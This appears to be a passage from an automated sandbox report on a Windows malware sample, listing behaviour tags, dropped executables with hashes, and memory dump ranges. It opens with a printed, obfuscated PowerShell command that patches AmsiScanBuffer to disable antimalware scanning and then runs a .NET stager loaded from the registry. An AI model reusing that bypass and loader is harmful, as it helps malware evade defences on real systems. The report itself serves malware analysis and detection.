u.Invoke($Null,@([Object]$LnHlERh,[Object]('Am'+'s'+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+'B'+[Char](117)+'f'+[Char](102)+'e'+[Char](114)+'')));$kByVElCBpi=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xvIqRqgqDflHaHqxn,$qGLejpLRcnsNjbicomptTu).Invoke($XkggMzyefYGwaYDuN,[uint32]8,4,[ref]$kByVElCBpi);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XkggMzyefYGwaYDuN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xvIqRqgqDflHaHqxn,$qGLejpLRcnsNjbicomptTu).Invoke($XkggMzyefYGwaYDuN,[uint32]8,0x20,[ref]$kByVElCBpi);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                          1⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:1192

                        Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                Filesize

                                2KB

                                MD5

                                d85ba6ff808d9e5444a4b369f5bc2730

                                SHA1

                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                SHA256

                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                SHA512

                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                19KB

                                MD5

                                64cec631a82f9a5c7172c4b197a36cbd

                                SHA1

                                ab5fd498f9e9ff18b96a3e6eb3b14199b2641f37

                                SHA256

                                615d771aa92d326b4ea5e314376ceaba2320132039c94f1711e909b7cd618cc7

                                SHA512

                                6a7ddfe91cd1b1867770026ca6737df32173f84028b5b72ccdef1b102b34340f663cf0e732fca0490d53589d3d0089ebdc37144aee09040a6ef8b853b4937dcd

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                948B

                                MD5

                                a7ce8cefc3f798abe5abd683d0ef26dd

                                SHA1

                                b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e

                                SHA256

                                5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a

                                SHA512

                                c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

                              • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                Filesize

                                1.4MB

                                MD5

                                bb86a343080f9f4696c250ef31a18d9d

                                SHA1

                                43b2193dcb1d56eac73ba88a7b461822074192d6

                                SHA256

                                095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                SHA512

                                24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                              • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                Filesize

                                1.4MB

                                MD5

                                bb86a343080f9f4696c250ef31a18d9d

                                SHA1

                                43b2193dcb1d56eac73ba88a7b461822074192d6

                                SHA256

                                095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                SHA512

                                24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                Filesize

                                3.7MB

                                MD5

                                f5c51e7760315ad0f0238d268c03c60e

                                SHA1

                                85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                SHA256

                                ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                SHA512

                                d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                Filesize

                                3.7MB

                                MD5

                                f5c51e7760315ad0f0238d268c03c60e

                                SHA1

                                85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                SHA256

                                ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                SHA512

                                d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                Filesize

                                1.4MB

                                MD5

                                b6bbab9f72c88d07b484cc339c475e75

                                SHA1

                                f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                SHA256

                                dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                SHA512

                                1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                Filesize

                                1.4MB

                                MD5

                                b6bbab9f72c88d07b484cc339c475e75

                                SHA1

                                f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                SHA256

                                dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                SHA512

                                1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                              • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                Filesize

                                674KB

                                MD5

                                e479ecb1802253a4c94767c8af306baf

                                SHA1

                                846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                SHA256

                                b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                SHA512

                                b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                              • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                Filesize

                                674KB

                                MD5

                                e479ecb1802253a4c94767c8af306baf

                                SHA1

                                846bb5d88b91b8aa17bdb58eaf246b10e6586402

                                SHA256

                                b9bfdd7d9a090da9ceaf2d4df414e8fd212a048692b5d90cec81d4e1b1918679

                                SHA512

                                b42458e3c4b0d8833092323e2f8e2afac015822ac8a7cffbc41c930d61f32b77a6d37bb3b480a5aa538090fe2492dd124732280b4fa0a0c0f2c8cfe9d2d52373

                              • memory/1100-185-0x0000000002205000-0x0000000002709000-memory.dmp

                                Filesize

                                5.0MB

                              • memory/1100-173-0x0000000002205000-0x0000000002709000-memory.dmp

                                Filesize

                                5.0MB

                              • memory/1100-174-0x0000000002717000-0x0000000002854000-memory.dmp

                                Filesize

                                1.2MB

                              • memory/1100-187-0x0000000002717000-0x0000000002854000-memory.dmp

                                Filesize

                                1.2MB

                              • memory/1192-215-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1192-209-0x00007FFC657C0000-0x00007FFC66281000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1192-213-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1192-214-0x00007FFC83A30000-0x00007FFC83AEE000-memory.dmp

                                Filesize

                                760KB

                              • memory/1192-221-0x00007FFC657C0000-0x00007FFC66281000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1192-219-0x00007FFC83A30000-0x00007FFC83AEE000-memory.dmp

                                Filesize

                                760KB

                              • memory/1192-220-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1732-190-0x00007FFC65560000-0x00007FFC66021000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1732-186-0x000001CFF08D0000-0x000001CFF08F2000-memory.dmp

                                Filesize

                                136KB

                              • memory/1732-189-0x00007FFC65560000-0x00007FFC66021000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/1944-216-0x0000000140000000-0x0000000140029000-memory.dmp

                                Filesize

                                164KB

                              • memory/1944-226-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1944-222-0x0000000140000000-0x0000000140029000-memory.dmp

                                Filesize

                                164KB

                              • memory/1944-225-0x0000000140000000-0x0000000140029000-memory.dmp

                                Filesize

                                164KB

                              • memory/1944-223-0x00007FFC850D0000-0x00007FFC852C5000-memory.dmp

                                Filesize

                                2.0MB

                              • memory/1944-224-0x00007FFC83A30000-0x00007FFC83AEE000-memory.dmp

                                Filesize

                                760KB

                              • memory/2016-169-0x00000000053E0000-0x0000000005472000-memory.dmp

                                Filesize

                                584KB

                              • memory/2016-172-0x0000000005850000-0x000000000585A000-memory.dmp

                                Filesize

                                40KB

                              • memory/2016-165-0x0000000000930000-0x0000000000A9C000-memory.dmp

                                Filesize

                                1.4MB

                              • memory/3544-212-0x0000000007AA0000-0x0000000007FCC000-memory.dmp

                                Filesize

                                5.2MB

                              • memory/3544-184-0x0000000001A40000-0x0000000001A7C000-memory.dmp

                                Filesize

                                240KB

                              • memory/3544-183-0x0000000005880000-0x000000000598A000-memory.dmp

                                Filesize

                                1.0MB

                              • memory/3544-182-0x00000000019E0000-0x00000000019F2000-memory.dmp

                                Filesize

                                72KB

                              • memory/3544-181-0x0000000005D90000-0x00000000063A8000-memory.dmp

                                Filesize

                                6.1MB

                              • memory/3544-176-0x0000000000400000-0x0000000000420000-memory.dmp

                                Filesize

                                128KB

                              • memory/3544-210-0x0000000007180000-0x00000000071D0000-memory.dmp

                                Filesize

                                320KB

                              • memory/3544-199-0x0000000005D60000-0x0000000005D7E000-memory.dmp

                                Filesize

                                120KB

                              • memory/3544-211-0x00000000073A0000-0x0000000007562000-memory.dmp

                                Filesize

                                1.8MB

                              • memory/3544-197-0x0000000005CA0000-0x0000000005D16000-memory.dmp

                                Filesize

                                472KB

                              • memory/4032-133-0x0000000000400000-0x0000000000405000-memory.dmp

                                Filesize

                                20KB

                              • memory/4032-139-0x0000000000400000-0x0000000000405000-memory.dmp

                                Filesize

                                20KB

                              • memory/4840-151-0x0000000007110000-0x000000000712A000-memory.dmp

                                Filesize

                                104KB

                              • memory/4840-148-0x0000000075130000-0x000000007517C000-memory.dmp

                                Filesize

                                304KB

                              • memory/4840-158-0x0000000008380000-0x0000000008924000-memory.dmp

                                Filesize

                                5.6MB

                              • memory/4840-156-0x0000000007380000-0x0000000007388000-memory.dmp

                                Filesize

                                32KB

                              • memory/4840-155-0x0000000007390000-0x00000000073AA000-memory.dmp

                                Filesize

                                104KB

                              • memory/4840-154-0x0000000007340000-0x000000000734E000-memory.dmp

                                Filesize

                                56KB

                              • memory/4840-153-0x00000000073D0000-0x0000000007466000-memory.dmp

                                Filesize

                                600KB

                              • memory/4840-152-0x0000000007180000-0x000000000718A000-memory.dmp

                                Filesize

                                40KB

                              • memory/4840-150-0x0000000007750000-0x0000000007DCA000-memory.dmp

                                Filesize

                                6.5MB

                              • memory/4840-149-0x00000000063B0000-0x00000000063CE000-memory.dmp

                                Filesize

                                120KB

                              • memory/4840-157-0x00000000074A0000-0x00000000074C2000-memory.dmp

                                Filesize

                                136KB

                              • memory/4840-147-0x00000000063D0000-0x0000000006402000-memory.dmp

                                Filesize

                                200KB

                              • memory/4840-146-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

                                Filesize

                                120KB

                              • memory/4840-145-0x00000000057A0000-0x0000000005806000-memory.dmp

                                Filesize

                                408KB

                              • memory/4840-144-0x0000000005730000-0x0000000005796000-memory.dmp

                                Filesize

                                408KB

                              • memory/4840-143-0x0000000004D20000-0x0000000004D42000-memory.dmp

                                Filesize

                                136KB

                              • memory/4840-142-0x0000000004F10000-0x0000000005538000-memory.dmp

                                Filesize

                                6.2MB

                              • memory/4840-141-0x0000000004830000-0x0000000004866000-memory.dmp

                                Filesize

                                216KB

                              • memory/4972-202-0x00007FFC655C0000-0x00007FFC66081000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4972-206-0x00007FFC655C0000-0x00007FFC66081000-memory.dmp

                                Filesize

                                10.8MB